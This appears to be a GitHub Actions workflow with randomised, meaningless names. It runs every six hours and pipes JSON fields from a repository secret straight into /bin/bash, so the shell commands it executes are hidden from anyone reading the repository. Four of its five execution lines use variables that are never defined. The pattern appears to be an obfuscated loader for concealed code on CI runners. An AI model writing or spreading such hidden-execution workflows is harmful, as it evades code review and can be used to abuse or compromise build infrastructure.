name: chenfengqiao4567

on:
  workflow_dispatch:
  schedule:
    - cron: '26 5/6 * * *'

jobs:  # 26088
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenfengqiao4567
        env:
          zw7843: ${{ secrets.zw7843 }}
        run: |
          echo $zw7843 | jq -r .lbjbq6351 | /bin/bash
          echo $hf515 | jq -r .pb61385 | /bin/bash
          echo $qz72 | jq -r .kr60432 | /bin/bash
          echo $nd10075 | jq -r .r6665 | /bin/bash
          echo $bqdgl4 | jq -r .euw063 | /bin/bash

